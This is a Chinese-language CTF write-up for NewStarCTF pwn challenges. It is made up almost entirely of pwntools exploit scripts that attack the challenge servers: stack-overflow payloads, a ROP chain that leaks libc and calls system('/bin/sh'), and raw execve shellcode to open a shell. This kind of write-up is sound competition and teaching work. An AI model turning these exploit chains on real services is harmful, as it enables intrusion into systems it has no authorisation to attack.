NewStarCTF 公开赛wp

ret2text

这里有个栈溢出，话不多说，上脚本。

from pwn import *
p=remote('node4.buuoj.cn',26128)
# p=process('./node4.buuoj.cn:25505')
payload=b'a'*0x20+p64(0xdeadbeef)+p64(0x00000400708)
p.sendlineafter('Welcome!May I have your name?\n',payload)
p.interactive()

calc

代码意思就是直接就是计算100次数据然后得到shell,你需要做的就是写个脚本计算这100次运算。

from pwn import *
context.log_level='debug'
p=remote('node4.buuoj.cn',25181)
# p=process('./pwn')
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
def dbg():
    gdb.attach(p)
    pause()
result=0
for i in range(100):
    p.recvuntil("What's the answer? ")
    num1=int(p.recvuntil(b' ',drop=True))
    char=p.recvuntil(b' ',drop=True)
    num2=int(p.recvuntil(b' ',drop=True))
    if char=='x':
        result=num1*num2
    elif char=='+':
        result=num1+num2
    elif char=='-':
        result=num1-num2
    elif char=='/':
        result=num1/num2
    # lg('result')
    # print num1
    # print(char) 
    # print num2
    p.recvuntil('= what?\n',drop=True)
    p.sendline(str(result))
    # p.recvline()
# s=[num1 ,char ,num2]
    # result=exec('num1 char num2')
# # # print result
# p.sendline(result)
p.interactive()

ret2libc

栈溢出，但是没有后门函数，但是给了libc,于是就是ret2libc。

# from LibcSearcher import *
context.log_level='debug'
# p=process('./pwn')
p=remote('node4.buuoj.cn',28744)
def dbg():
    gdb.attach(p)
    pause()
elf=ELF('./pwn')
libc=ELF('./libc-2.31.so')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
mainaddr=0x00400698
pop_rdi=0x0000000000400753
ret=0x000000000040050e
payload=b'a'*0x20+p64(0xdeadbeef)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(mainaddr)
p.sendlineafter('Glad to meet you again!What u bring to me this time?',payload)
p.recvuntil('Ok.See you!\n')
putsaddr=u64(p.recv(6).ljust(8, "\x00"))
lg('putsaddr')
# dbg()
# libc = LibcSearcher("puts", putsaddr)
# offset=0x84420
libcbase = putsaddr - libc.symbols['puts']
system = libcbase + libc.symbols["system"]
bin_sh = next(libc.search(b"/bin/sh\x00"))+libcbase
lg('libcbase')
lg('system')
lg('bin_sh')
# dbg()
payload=b'a'*0x20+p64(0xdeadbeef)+p64(ret)+ p64(pop_rdi)+ p64(bin_sh)+p64(system) 
# payload=b'a'*0x20+p64(0xdeadbeef)+p64(system)+p64(1)+ p64(bin_sh)
# payload=b'a'*0x20+p64(0xdeadbeef)+ p64(0xe3cf9+offset)

p.sendlineafter('Glad to meet you again!What u bring to me this time?',payload)


p.interactive()

ret2shellcode

又是栈溢出，顾题思议，ret2shellcode呗。

port imp
from pwn import *
context.log_level='debug'
p=remote('node4.buuoj.cn',29095)
# p=process('./pwn')
shellcode="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
p.sendlineafter('Hello my friend.Any gift for me?\n',shellcode)
payload=b'a'*0x30+p64(0)+p64(0x233000)
p.sendlineafter('Anything else?\n',payload)
p.interactive()